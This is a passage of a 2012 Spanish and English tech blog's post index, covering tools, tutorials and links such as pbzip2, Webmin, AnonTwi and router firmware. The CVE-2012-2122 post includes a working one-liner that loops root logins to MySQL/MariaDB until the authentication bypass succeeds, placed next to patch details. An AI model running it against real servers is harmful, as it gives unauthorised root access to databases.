href=\"http://en.wikipedia.org/wiki/Eight_queens_puzzle\"\u003ehttp://en.wikipedia.org/wiki/Eight_queens_puzzle\u003c/a\u003e )\u003c/p\u003e\n\u003cp\u003eA solution to the 8 Queen problem is where 8 queens are placed on a\nchess board so that no queen can take any other queen.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» @stormingrobots | \u003ca href=\"https://www.youtube.com/watch?v=5a2xIh6xgo4\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"The 8 Queens Problem with Arduino and Adafruit 8x8 Matrix display"},{"content":" This is a short documentary about the LEGO Turing Machine built by Jeroen van den Bos and Davy Landman at Centrum Wiskunde \u0026amp; Informatica (CWI), Amsterdam (Netherlands). They built it for CWI’s exposition ”Turings Erfenis” in honor of the centenary of Alan Turing’s birth on 23 June 1912. Alan Turing was a brilliant mathematician who helped define the theoretical model of the computer as we know it today. He was a visionary, one of the few people of his time who recognized the role the computer would play for humanity. The Turing Machine (1936) is an adequate model of a computer. It can do anything the computers of today or tomorrow can do.\nVer vídeo\n» @ecalpemos | vimeo.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/lego-turing-machine/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is a short documentary about the LEGO Turing Machine built by\nJeroen van den Bos and Davy Landman at Centrum Wiskunde \u0026amp; Informatica\n(CWI), Amsterdam (Netherlands). They built it for CWI’s exposition\n”Turings Erfenis” in honor of the centenary of Alan Turing’s birth on\n23 June 1912.\nAlan Turing was a brilliant mathematician who helped define the\ntheoretical model of the computer as we know it today. He was a\nvisionary, one of the few people of his time who recognized the role\nthe computer would play for humanity.\nThe Turing Machine (1936) is an adequate model of a computer. It can\ndo anything the computers of today or tomorrow can do.\u003c/p\u003e","title":"LEGO Turing Machine"},{"content":" I’ve been wondering for some time whether the power consumption of an ATmega varies depending on the code it is running. Obviously, sleep modes and clock rate changes have a major impact – but how about plain loops?\n» jeelabs.org\n","permalink":"http://karpoke.ignaciocano.com/2012/06/16/code-vs-power-consumption/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’ve been wondering for some time whether the power consumption of an\nATmega varies depending on the code it is running. Obviously, sleep\nmodes and clock rate changes have a major impact – but how about plain\nloops?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://jeelabs.org/2012/06/13/code-vs-power-consumption/\"\u003ejeelabs.org\u003c/a\u003e\u003c/p\u003e","title":"Code vs. power consumption"},{"content":" ”This is a free minix-like kernel for i386(+) based AT-machines,” began the Linux version 0.01 release notes in September of 1991 for the first release of the Linux kernel. ”As the version number (0.01) suggests this is not a mature product. Currently only a subset of AT-hardware is supported (hard-disk, screen, keyboard and serial lines), and some of the system calls are not yet fully implemented (notably mount/umount aren’t even implemented).” Booting the original 0.01 Linux kernel required bootstrapping it with minix, and the keyboard driver was written in assembly and hard-wired for a Finnish keyboard. The listed features were mostly presented as a comparison to minix and included, efficiently using the 386 chip rather than the older 8088, use of system calls rather than message passing, a fully multithreaded FS, minimal task switching, and visible interrupts. Linus Torvalds noted, ”the guiding line when implementing linux was: get it working fast. I wanted the kernel simple, yet powerful enough to run most unix software.”\n» kerneltrap.org\n","permalink":"http://karpoke.ignaciocano.com/2012/06/16/linux-the-0-01-release/","summary":"\u003cblockquote\u003e\n\u003cp\u003e”This is a free minix-like kernel for i386(+) based AT-machines,”\nbegan the Linux version 0.01 release notes in September of 1991 for\nthe first release of the Linux kernel. ”As the version number (0.01)\nsuggests this is not a mature product. Currently only a subset of\nAT-hardware is supported (hard-disk, screen, keyboard and serial\nlines), and some of the system calls are not yet fully implemented\n(notably mount/umount aren’t even implemented).” Booting the original\n0.01 Linux kernel required bootstrapping it with minix, and the\nkeyboard driver was written in assembly and hard-wired for a Finnish\nkeyboard. The listed features were mostly presented as a comparison to\nminix and included, efficiently using the 386 chip rather than the\nolder 8088, use of system calls rather than message passing, a fully\nmultithreaded FS, minimal task switching, and visible interrupts.\nLinus Torvalds noted, ”the guiding line when implementing linux was:\nget it working fast. I wanted the kernel simple, yet powerful enough\nto run most unix software.”\u003c/p\u003e","title":"Linux: The 0.01 Release"},{"content":" Tu jefe lo quiere para ayer, pero más vale que cumpla con los standards de mañana. Los clientes quieren todas las características que se puedan imaginar, pero no te atrevas a confundirlos dándoles todos los botones que desee. Tus compañeros programadores quieren que documentes tu código, pero ellos simplemente responden ”tl;dr” (Too Long; didn’t read) a cualquier cosa que escribes.\nAsí como la tecnología evoluciona, también lo hacen los dilemas que enfrentan los desarrolladores. Cada elección, desde la plataforma hasta el almacenamiento de datos, incluyendo a cuánto control darle a los usuarios, está cargada de preguntas. Y gracias a la nube, el crecimiento de la tecnología móvil y la acelerada vanguardia, pareciera como si el mundo de la programación enfrentara una nueva elección – y dilema – a un ritmo creciente.\n» elbauldelprogramador.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/16/el-top-7-de-dilemas-que-enfrentan-los-desarrolladores-de-hoy/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTu jefe lo quiere para ayer, pero más vale que cumpla con los\nstandards de mañana. Los clientes quieren todas las características\nque se puedan imaginar, pero no te atrevas a confundirlos dándoles\ntodos los botones que desee. Tus compañeros programadores quieren que\ndocumentes tu código, pero ellos simplemente responden ”tl;dr” (Too\nLong; didn’t read) a cualquier cosa que escribes.\u003c/p\u003e\n\u003cp\u003eAsí como la tecnología evoluciona, también lo hacen los dilemas que\nenfrentan los desarrolladores. Cada elección, desde la plataforma\nhasta el almacenamiento de datos, incluyendo a cuánto control darle a\nlos usuarios, está cargada de preguntas. Y gracias a la nube, el\ncrecimiento de la tecnología móvil y la acelerada vanguardia,\npareciera como si el mundo de la programación enfrentara una nueva\nelección – y dilema – a un ritmo creciente.\u003c/p\u003e","title":"El Top 7 de dilemas que enfrentan los desarrolladores de hoy"},{"content":"AnonTwi es un script en Python que permite enviar y recibir tweets y mensajes cifrados mediante AES y HMAC-SHA1 en Twitter, al que se conecta mediante SSL. Otras caracterísiticas son la posibilidad de usar la red TOR, envío de mensajes largos o la falsificación de las cabeceras que envía.\nInstalación AnonTwi está todavía en fase beta de desarrollo, algo que se debe tener en cuenta según el uso que queramos darle, pero si queremos probarlo, podemos usar la última versión descargándola del repositorio:\n$ hg clone http://hg.code.sf.net/p/anontwi/code anontwi-code Instalamos las dependencias:\n$ sudo aptitude install python-crypto python-httplib2 OAuth Para utilizar OAuth con Twitter, vamos a dev.twitter.com, iniciamos sesión y creamos una App:\n__Name:** El que queramos, pero debe ser único. Description: AnonTwi: AES + HMAC-SHA1 encryption on Tweets and Direct Messages Website: http://anontwi.sf.net Una vez creada, copiamos las claves Consumer key y Consumer secret que utilizaremos más tarde. En la pestaña de configuración, cambiamos los permisos de la aplicación para que pueda leer, escribir y enviar mensajes directos.\nVamos al directorio donde nos hemos descargado AnonTwi y editamos el fichero config.py para incluir dichas claves.\nTokens Además de las claves que hemos creado, necesitaremos dos tokens de acceso, no debemos crearlos desde el panel de administración de la aplicación que hemos creado, sino con el propio script:\n$ ./anontwi --tokens Seguimos el enlace, que nos llevará hasta la página que nos pide que autoricemos la aplicación, y tras autorizarla nos devolverá el PIN que deberemos pasarle al script.\nA continuación se crean los tokens de acceso. AnonTwi no guarda estos valores, así que para evitar tener que estar continuamente pasándoselos al script podemos exportar las siguientes variables:\n$ export ANONTWI_TOKEN_KEY=6684922-Foa6b1KShUIWviFHjFfZrASyYKV8fPe9teXZwWllIE $ export ANONTWI_TOKEN_SECRET=izXb9vG8xWKAgH2GvYzl8EqeJDalSGg2MkrheoasoI Si las copiamos al final del fichero ~/.bashrc no tendremos que volver a preocuparnos.\nEjemplos La sintáxis para utilizar el script es la siguiente:\n$ ./anontwi [-m \u0026#39;text\u0026#39; | -r \u0026#39;ID\u0026#39; | -d @user | -f @nick | -u @nick] [OPTIONS] \u0026#39;token key\u0026#39; \u0026#39;token secret\u0026#39; Para enviar un mensaje cifrado a un usuario, tenemos que compartir una clave, que el usuario utilizará para descifrarlo. Podemos utilizar el script para crear una clave segura y aleatoria:\n$ ./anontwi --gen PIN key: P/2/QwWyVp48ta8+T4oasd/G6wNWELt9/MjUZlWs53M= Ahora ya podemos enviar un mensaje directo cifrado:\n$ ./anontwi -m \u0026#34;See you later\u0026#34; -d \u0026#34;@nick\u0026#34; --enc --pin \u0026#34;P/2/QwWyVp48ta8+T4oasd/G6wNWELt9/MjUZlWs53M=\u0026#34; =========================================================================== AnonTwi [0.4] - 2012 - http://anontwi.sf.net -\u0026gt; by psy =========================================================================== Starting to send your DM (direct message)... :) =========================================================================== Message [ Number of words: 3 - Number of waves: 1 ] ------------- \u0026#34;See you later\u0026#34; ------------- To: \u0026#34;@nick\u0026#34; ------ [Info] DM sended correctly! Para enviar un tweet cifrado:\n$ ./anontwi -m \u0026#34;Hello World\u0026#34; --enc --pin \u0026#34;mystrongpassword\u0026#34; Para descifrar un tweet podemos hacerlo incluyendo directamente el contenido del tweet:\n$ ./anontwi --dec \u0026#34;7asNGpFFDKQl7ku9om9CQfEKDq1ablUW+srgaFiEMa+YK0no8pXsx8pR\u0026#34; --pin \u0026#34;friend\u0026#39;s key\u0026#34; O introduciendo la URL del tweet:\n$ ./anontwi --dec \u0026#34;http://twitter.com/encrypted_message_path\u0026#34; --pin \u0026#34;friend\u0026#39;s key\u0026#34; Se pueden ver muchos más ejemplos de uso en el archivo README.txt.\nInterfaz gráfica Hay disponible un módulo, Simple Decript Tool, que permite utilizar una herramienta gráfica en lugar del terminal para descifrar los mensajes. Si queremos probarla, antes instalaremos las dependencias:\n$ sudo aptitude install gambas2 Descargamos el paquete, lo descomprimimos y lo instalamos:\n$ wget http://freesoftwareando.com/gambas-anontwi_all.deb.tar.gz $ tar xzvf gambas-anontwi_all.deb.tar.gz $ sudo dpkg -i gambas-anontwi_0.0.10-1_all.deb Al instalarlo, me ha surgido el siguiente error:\nEn el fichero ;`/usr/share/menu/gambas-anontwi;\u0026#39;, en (o en la defición que termina en) la línea 4: ?package(gambas-anontwi):needs=\u0026#34;X11\u0026#34; section \u0026#34;Applications/Network/Communication\u0026#34; title=\u0026#34;AnonTwi Simple Decrypt Tool\u0026#34; command=\u0026#34;/usr/bin/gambas-anontwi.gambas\u0026#34; icon=\u0026#34;/usr/share/pixmaps/gambas-anontwi.png\u0026#34; ^ Esperaba: ;`=;\u0026#39; Parece ser debido a una pequeña errata en el fichero /usr/share/menu/gambas-anontwi. Si queremos corregirlo, descomprimimos el fichero gambas-anontwi_0.0.10-1_all.deb:\n$ mkdir temp $ dpkg-deb --extract gambas-anontwi_0.0.10-1_all.deb temp $ dpkg-deb --control gambas-anontwi_0.0.10-1_all.deb temp/DEBIAN Modificamos el fichero temp/usr/share/menu/gambas-anontwi para incluir el = que falta, de tal manera que quede así:\n?package(gambas-anontwi):needs=\u0026#34;X11\u0026#34; section=\u0026#34;Applications/Network/Communication\u0026#34; title=\u0026#34;AnonTwi Simple Decrypt Tool\u0026#34; command=\u0026#34;/usr/bin/gambas-anontwi.gambas\u0026#34; icon=\u0026#34;/usr/share/pixmaps/gambas-anontwi.png\u0026#34; Volvemos a crear el paquete:\n$ dpkg --build temp $ mv temp.deb gambas-anontwi_0.0.10-1_all.deb Y lo instalamos:\n$ sudo dpkg -i gambas-anontwi_0.0.10-1_all.deb Para lanzar la aplicación podemos hacerlo desde el menú, o lanzando el siguiente comando en el terminal\n$ anontwi.gambas Referencias » anontwi.sourceforge.net » AnonTwi: cliente de Twitter que permite cifrar tweets y mensajeria privada » Como cambiar las dependencias de un paquete (.deb)\n","permalink":"http://karpoke.ignaciocano.com/2012/06/16/anontwi-tweets-cifrados/","summary":"\u003cp\u003e\u003ca href=\"http://anontwi.sourceforge.net/\"\u003eAnonTwi\u003c/a\u003e es un \u003cem\u003escript\u003c/em\u003e en Python que permite enviar y recibir\n\u003cem\u003etweets\u003c/em\u003e y mensajes cifrados mediante AES y HMAC-SHA1 en Twitter, al que\nse conecta mediante SSL. Otras caracterísiticas son la posibilidad de\nusar la red TOR, envío de mensajes largos o la falsificación de las\ncabeceras que envía.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003eAnonTwi está todavía en fase \u003cem\u003ebeta\u003c/em\u003e de desarrollo, algo que se debe\ntener en cuenta según el uso que queramos darle, pero si queremos\nprobarlo, podemos usar la última versión descargándola del repositorio:\u003c/p\u003e","title":"AnonTwi, tweets cifrados"},{"content":" El efecto Dunning-Kruger se puede expresar de la siguiente manera: los peores trabajadores/estudiantes/participantes son los que menos conscientes son de su propia incompetencia. Toma su nombre de un estudio de 2003 que realizaron Dunning, Kruger y otros con estudiantes universitarios con respecto a los resultados de sus exámenes. Después los resultados han sido reproducidos en varias ocasiones, por ejemplo con estudiantes de medicina a la hora de evaluar su capacidad para realizar entrevistas de diagnóstico, con administrativos evaluando su rendimiento o con técnicos de laboratorios médicos calibrando su nivel de dominio del trabajo.\n» experientiadocet.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/14/socrates-y-el-efecto-dunning-kruger/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl efecto Dunning-Kruger se puede expresar de la siguiente manera: los\npeores trabajadores/estudiantes/participantes son los que menos\nconscientes son de su propia incompetencia. Toma su nombre de un\nestudio de 2003 que realizaron Dunning, Kruger y otros con estudiantes\nuniversitarios con respecto a los resultados de sus exámenes. Después\nlos resultados han sido reproducidos en varias ocasiones, por ejemplo\ncon estudiantes de medicina a la hora de evaluar su capacidad para\nrealizar entrevistas de diagnóstico, con administrativos evaluando su\nrendimiento o con técnicos de laboratorios médicos calibrando su nivel\nde dominio del trabajo.\u003c/p\u003e","title":"Sócrates y el efecto Dunning-Kruger"},{"content":"pbzip2, de parallel bzip2, permite aprovechar toda la potencia de los procesadores con más de un núcleo a la hora de comprimir o descomprimir, cosa que bzip2 no hace.\nInstalación En Ubuntu se encuentra disponible en los repositorios:\n$ sudo aptitude install pbzip2 Su uso es idéntico al de bzip2, por lo que podemos añadir un alias a ~/.bash_aliases:\nalias bzip2=pbzip2 Referencias » Speed Up Compression via Parallel BZIP2 (PBZIP2)\n","permalink":"http://karpoke.ignaciocano.com/2012/06/13/pbzip2-un-bzip2-mas-rapido/","summary":"\u003cp\u003e\u003ccode\u003epbzip2\u003c/code\u003e, de \u003cem\u003eparallel bzip2\u003c/em\u003e, permite aprovechar toda la potencia de\nlos procesadores con más de un núcleo a la hora de comprimir o\ndescomprimir, cosa que \u003ccode\u003ebzip2\u003c/code\u003e no hace.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003eEn Ubuntu se encuentra disponible en los repositorios:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install pbzip2\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSu uso es idéntico al de \u003ccode\u003ebzip2\u003c/code\u003e, por lo que podemos añadir un \u003cem\u003ealias\u003c/em\u003e a\n\u003ccode\u003e~/.bash_aliases\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ealias bzip2=pbzip2\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"referencias\"\u003eReferencias\u003c/h2\u003e\n\u003cp\u003e» \u003ca href=\"http://hackercodex.com/guide/parallel-bzip-compression/\"\u003eSpeed Up Compression via Parallel BZIP2 (PBZIP2)\u003c/a\u003e\u003c/p\u003e","title":"pbzip2, un bzip2 más rápido"},{"content":" La semana pasada desayuné con un polémico artículo de Enrique Dans titulado ”El Programador Perdido”, en el que lamentaba la falta de buenos programadores en España. Programadores con cabeza y riñones suficientes para sacar adelante un proyecto ganador en una industria global y competitiva como Internet.\nSi quieres encontrar un buen programador, básicamente sólo tienes que hacer una cosa: pagarlo.\nPero esa presunción –como las comparaciones con la supuesta calificación y estatus de los programadores extranjeros- es errónea y estereotipada. Después de más de 10 años trabajando en la industria del software, tanto en España como en eso que llaman Silicon Valley, yo conozco otra verdad. Una verdad incómoda.\n» bonillaware.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/12/la-falacia-del-programador-perdido/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa semana pasada desayuné con un polémico artículo de Enrique Dans\ntitulado ”El Programador Perdido”, en el que lamentaba la falta de\nbuenos programadores en España. Programadores con cabeza y riñones\nsuficientes para sacar adelante un proyecto ganador en una industria\nglobal y competitiva como Internet.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eSi quieres encontrar un buen programador, básicamente sólo tienes\nque hacer una cosa: pagarlo.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003ePero esa presunción –como las comparaciones con la supuesta\ncalificación y estatus de los programadores extranjeros- es errónea y\nestereotipada. Después de más de 10 años trabajando en la industria\ndel software, tanto en España como en eso que llaman Silicon Valley,\nyo conozco otra verdad. Una verdad incómoda.\u003c/p\u003e","title":"La falacia del Programador Perdido"},{"content":"Webmin es una interfaz web para la administración de un servidor, compatible con cualquier navegador moderno, mediante la que podemos configurar cuentas de usuario, Apache, DNS, intercambio de ficheros, etc. Es una alternativa a la configuración manual de ficheros.\nInstalación Instalamos las dependencias:\n$ sudo aptitude install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl apt-show-versions Descargamos el paquete para Ubuntu y lo instalamos:\n$ wget http://downloads.sourceforge.net/webadmin/webmin_1.580_all.deb $ md5sum webmin_1.580_all.deb 093c720a988125a536fa9fda16080fe6 $ sudo dpkg -i webmin_1.580_all.deb Para usar Webmin, accedemos al servidor en el puerto 10000. El usuario y la contraseña son los mismos que utilizamos para iniciar sesión en el servidor.\nSi fuese el caso, activamos la regla en el cortafuegos. Por ejemplo, si usamos ufw y queremos permitir el acceso únicamente desde la misma red:\n$ sudo ufw allow proto tcp from 192.168.50.0/24 to any port 10000 ","permalink":"http://karpoke.ignaciocano.com/2012/06/12/webmin-configurando-nuestro-servidor-a-traves-del-navegador/","summary":"\u003cp\u003e\u003ca href=\"http://www.webmin.com/\"\u003eWebmin\u003c/a\u003e es una interfaz web para la administración de un servidor,\ncompatible con cualquier navegador moderno, mediante la que podemos\nconfigurar cuentas de usuario, Apache, DNS, intercambio de ficheros,\netc. Es una alternativa a la configuración manual de ficheros.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003eInstalamos las dependencias:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl apt-show-versions\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eDescargamos el paquete para Ubuntu y lo instalamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget http://downloads.sourceforge.net/webadmin/webmin_1.580_all.deb\n$ md5sum webmin_1.580_all.deb\n093c720a988125a536fa9fda16080fe6\n$ sudo dpkg -i webmin_1.580_all.deb\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara usar Webmin, accedemos al servidor en el puerto 10000. El usuario y\nla contraseña son los mismos que utilizamos para iniciar sesión en el\nservidor.\u003c/p\u003e","title":"webmin, configurando nuestro servidor a través del navegador"},{"content":"Un fallo descubierto en MariaDB, y que también afecta a MySQL, permite saltarse la autenticación para acceder a la base de datos utilizando cualquier usuario válido, incluido el root, sin importar la contraseña. Cada vez que un usuario se conecta se genera un token SHA aleatorio y se compara con el valor esperado, pero bajo ciertas condiciones el resultado de esta comparación se considera válido aunque realmente no lo sea. Dado que el protocolo utiliza cadenas aleatorias, hay una probabilidad de 1/256 de que esto ocurra.\nNo todas las versiones son vulnerables:\nTodas las versiones de MariaDB y MySQL hasta la 5.1.61, 5.2.11, 5.3.5 y 5.5.22 son vulnerables. Las versiones de MariaDB desde la 5.1.62, 5.2.12, 5.3.6 y 5.5.23 no lo son. Las versiones de MySQL desde la 5.1.63, 5.5.24 y 5.6.6 no lo son. Explotación y medidas de protección Explotar un sistema vulnerable es tan sencillo como intentar conectarnos de forma repetida:\n$ for i in {1..512}; do echo \u0026#39;select @@version;\u0026#39; | mysql -uroot -ppass -h 127.0.0.1 2\u0026gt;/dev/null \u0026amp;\u0026amp; break; done Ya hay disponibles actualizaciones en los repositorios para las versiones afectadas.\nActualizado el 13 de junio de 2012 En hispasec amplían la noticia y explican muy detalladamente las condiciones en las que se produce el falso positivo en la comprobación de la contraseña. También he cambiado la prueba de concepto por la de HD Moore porque me parece más elegante :)\nMás información » CVE-2012-2122 » Security vulnerability in MySQL/MariaDB sql/password.c » MySQL o cómo es posible dar por válida una contraseña incorrecta\n","permalink":"http://karpoke.ignaciocano.com/2012/06/12/cve-2012-2122-saltandose-la-autenticacion-para-acceder-a-mysql-y-mariadb/","summary":"\u003cp\u003eUn fallo descubierto en MariaDB, y que también afecta a MySQL, permite\nsaltarse la autenticación para acceder a la base de datos utilizando\ncualquier usuario válido, incluido el root, sin importar la contraseña.\nCada vez que un usuario se conecta se genera un \u003cem\u003etoken\u003c/em\u003e SHA aleatorio y\nse compara con el valor esperado, pero bajo ciertas condiciones el\nresultado de esta comparación se considera válido aunque realmente no lo\nsea. Dado que el protocolo utiliza cadenas aleatorias, hay una\nprobabilidad de 1/256 de que esto ocurra.\u003c/p\u003e","title":"CVE 2012-2122, saltándose la autenticación para acceder a MySQL y MariaDB"},{"content":"CDE es un programa desarrollado por Philip Guo que permite crear versiones portables de aplicaciones GNU/Linux, automatizando el proceso de empaquetado de código, datos y dependencias requeridos para ejecutarlas en otros equipos, sin que su uso requiera instalación ni configuración.\nInstalación Si queremos instalar la última versión en desarrollo:\n$ git clone git://github.com/pgbovine/CDE.git $ cd CDE $ make Una vez que termine de compilar, tendremos el programa ejecutable, cde.\nCreando aplicaciones portables Si queremos crear un versión portable, sólo tenemos que llamar al ejecutable que hemos creado pasándole como parámetro el nombre del programa. Por ejemplo, para crear una versión portable de gimp:\n$ ~/CDE/cde gimp Esto creará el directorio cde-package, que será el que podamos copiar a otro equipo, y que contiene la versión portable de gimp: gimp.cde.\nPodemos crear un repositorio con las aplicaciones que prefiramos, simplemente ejecutando cde desde el mismo directorio.\n$ mkdir portable $ cd portable $ ~/CDE/cde gimp $ ~/CDE/cde lowriter $ ~/CDE/cde firefox Referencias » pgbovine.net » Via linuxzone.es\n","permalink":"http://karpoke.ignaciocano.com/2012/06/11/cde-creando-aplicaciones-portables-en-gnulinux/","summary":"\u003cp\u003e\u003ca href=\"http://www.pgbovine.net/cde.html\"\u003eCDE\u003c/a\u003e es un programa desarrollado por Philip Guo que permite crear\nversiones portables de aplicaciones GNU/Linux, automatizando el proceso\nde empaquetado de código, datos y dependencias requeridos para\nejecutarlas en otros equipos, sin que su uso requiera instalación ni\nconfiguración.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003eSi queremos instalar la última versión en desarrollo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ git clone git://github.com/pgbovine/CDE.git\n$ cd CDE\n$ make\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eUna vez que termine de compilar, tendremos el programa ejecutable,\n\u003ccode\u003ecde\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"creando-aplicaciones-portables\"\u003eCreando aplicaciones portables\u003c/h2\u003e\n\u003cp\u003eSi queremos crear un versión portable, sólo tenemos que llamar al\nejecutable que hemos creado pasándole como parámetro el nombre del\nprograma. Por ejemplo, para crear una versión portable de \u003ccode\u003egimp\u003c/code\u003e:\u003c/p\u003e","title":"CDE, creando aplicaciones portables en GNU/Linux"},{"content":" Yesterday Twitter announced that it was moving away from client-side rendering back to server-side rendering in order to improve page load time. Today I found myself having to defend my position that server-side rendering will almost always be faster. I figured I’d blog about it.\nI want to point out a couple things. First, I’m talking specifically about render performance and page speed. There might be other compelling advantages to thick-clients; I’m talking about performance. Secondly, I’m going to get on a high horse here and say that it worries me that developers think client-side rendering is faster. This is basic and fundamental knowledge about how the web and browsers work. Maybe I’ll be proven wrong. If I am, I’ll admit it. It’ll be embarrassing because it means that I don’t know the fundamentals. But I’ll be glad to have learned (which is why I blog).\n» openmymind.net\n","permalink":"http://karpoke.ignaciocano.com/2012/06/04/client-side-vs-server-side-rendering/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYesterday Twitter announced that it was moving away from client-side\nrendering back to server-side rendering in order to improve page load\ntime. Today I found myself having to defend my position that\nserver-side rendering will almost always be faster. I figured I’d blog\nabout it.\u003c/p\u003e\n\u003cp\u003eI want to point out a couple things. First, I’m talking specifically\nabout render performance and page speed. There might be other\ncompelling advantages to thick-clients; I’m talking about performance.\nSecondly, I’m going to get on a high horse here and say that it\nworries me that developers think client-side rendering is faster. This\nis basic and fundamental knowledge about how the web and browsers\nwork. Maybe I’ll be proven wrong. If I am, I’ll admit it. It’ll be\nembarrassing because it means that I don’t know the fundamentals. But\nI’ll be glad to have learned (which is why I blog).\u003c/p\u003e","title":"Client-Side vs. Server-Side Rendering"},{"content":" Cuando en 2006 los ingenieros de twitter estaban tratando de implementar OpenID para permitir a los desarrolladores de aplicaciones acceder a su API sin que los usuarios tuvieran que introducir sus credenciales en la propia aplicación, se dieron cuenta, por un lado, de que OpenID no era la solución que necesitaban y, más importante aún, de que no existía ningún estándar que permitiera hacer algo parecido.\nComenzaron entonces a trabajar en la implementación de OAuth, que pronto fue apoyada por otras empresas como Google. Hasta que por fin, en octubre de 2007, se publicó OAuth 1.0. Aunque no fue hasta agosto de 2010 que no se aprobó como estándar RFC 5849.\nPero, ¿cómo funciona OAuth y cómo soluciona el problema de que el usuario tenga que introducir sus credenciales en una aplicación de un tercero para acceder a otro servicio?\n» s21sec.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/04/oauth-open-authorization-protocol/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCuando en 2006 los ingenieros de twitter estaban tratando de\nimplementar OpenID para permitir a los desarrolladores de aplicaciones\nacceder a su API sin que los usuarios tuvieran que introducir sus\ncredenciales en la propia aplicación, se dieron cuenta, por un lado,\nde que OpenID no era la solución que necesitaban y, más importante\naún, de que no existía ningún estándar que permitiera hacer algo\nparecido.\u003c/p\u003e\n\u003cp\u003eComenzaron entonces a trabajar en la implementación de OAuth, que\npronto fue apoyada por otras empresas como Google. Hasta que por fin,\nen octubre de 2007, se publicó OAuth 1.0. Aunque no fue hasta agosto\nde 2010 que no se aprobó como estándar RFC 5849.\u003c/p\u003e","title":"OAuth - Open Authorization Protocol"},{"content":" ¿Qué desarrollador de software nunca ha estado una semana programando a toda velocidad, casi sin saber que hace, ya que la fecha de entrega está cerca y todo tiene que estar terminado ”para ayer”? ¿Quién no se ha encontrado en la situación de saber que está programando una chapuza, pensando que otro día lo mejorará, y ese día nunca llega? ¿Quién alguna vez, al ver una porción de código fuente no ha exclamado indignado: ¡qué narices hace este código! o ¡quién leches lo ha programado!?\nA todo este código lo solemos calificar como chapuzas, apaños, ñapas, mierdecillas¦ Su problema es que, por lo general, se va extendiendo de forma exponencial y acumulándose a lo largo del desarrollo de un proyecto. Y en consecuencia tenemos como resultado un código fuente que es muy difícil de mantener, extender y reutilizar; y un aplicativo que funcionalmente tiene problemas.\n» programandonet.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/04/deuda-tecnica/","summary":"\u003cblockquote\u003e\n\u003cp\u003e¿Qué desarrollador de software nunca ha estado una semana programando\na toda velocidad, casi sin saber que hace, ya que la fecha de entrega\nestá cerca y todo tiene que estar terminado ”para ayer”? ¿Quién no se\nha encontrado en la situación de saber que está programando una\nchapuza, pensando que otro día lo mejorará, y ese día nunca llega?\n¿Quién alguna vez, al ver una porción de código fuente no ha exclamado\nindignado: ¡qué narices hace este código! o ¡quién leches lo ha\nprogramado!?\u003c/p\u003e","title":"Deuda técnica"},{"content":"Si tenemos un router Comtrend AR-5381u, uno de los que entrega Jazztel, podemos actualizar el firmware que trae por uno libre no oficial.\n¿Por qué actualizar el firmware? Porque nos permite configurar completamente el router, sin restricciones. En particular, podremos cambiar el usuario de acceso al router o deshabilitar TS-069 (administración remota por parte de Jazztel y que es imposible deshabilitar con el firmware oficial) si queremos.\nInstalación Lo primero es escoger uno de los firmware disponibles. En mi caso, he probado el firmware 657003-457(AR-5382u-A731-406CTL-C01_R07).bin. Se puede descargar desde bandaancha.eu.\nActualizaremos el firmware desde la propia administración del router, pero antes deberíamos tener claros los parámetros para configurar nuestra conexión. Más adelante pondré los que yo he utilizado, pero pueden ser diferentes en otros casos. Lo más sencillo es hacer capturas de pantalla de cada opción del panel de administración, así estaremos seguros de que no nos dejamos nada.\nReseteamos el router, nos conectamos por cable y entramos al panel de administración. Después de haber reseteado el router, la IP por defecto será http://192.168.1.1, el usuario admin y la contraseña admin.\nNos conectamos al panel de administración, actualizaremos con el firmware que nos hemos descargado, en mi caso 657003-457(AR-5382u-A731-406CTL-C01_R07).bin, y le damos a actualizar.\nDespués de que termine, volvemos a resetear el router.\nPara que quede claro porque es importante, antes de actualizar reseteamos el router, actualizamos y volvemos a resetear.\nAhora ya podremos acceder al nuevo panel de administración en http://192.168.1.1. El usuario por defecto es root y la contraseña 12345. Esta es la que yo he utilizado pero dependiendo del firmware puede que la contraseña haya que dejarla en blanco, o incluso que usuario y contraseña sean user/user.\nConfiguración Esta es la configuración que he usado para una conexión 20 MB con Jazztel.\nLo primero es cambiar la contraseña de acceso. Vamos a Management \u0026gt; Access control:\nold username: root old password: 12345 Y ponemos el nuevo.\nTambién es interesante restringir el acceso al 